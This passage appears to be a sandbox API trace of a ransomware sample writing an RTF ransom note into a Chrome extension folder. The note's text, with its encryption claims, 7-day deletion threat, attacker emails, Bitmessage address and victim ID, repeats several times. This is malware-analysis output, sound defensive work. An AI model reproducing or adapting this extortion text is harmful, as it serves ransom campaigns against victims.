cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0286.482] WriteFile (in: hFile=0x2f0, lpBuffer=0x2460ba8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2460ba8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.483] CloseHandle (hObject=0x2f0) returned 1 [0286.483] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\#readme_eman#.rtf")) returned 0xffffffff [0286.483] GetLastError () returned 0x2 [0286.483] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.483] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.484] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.484] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 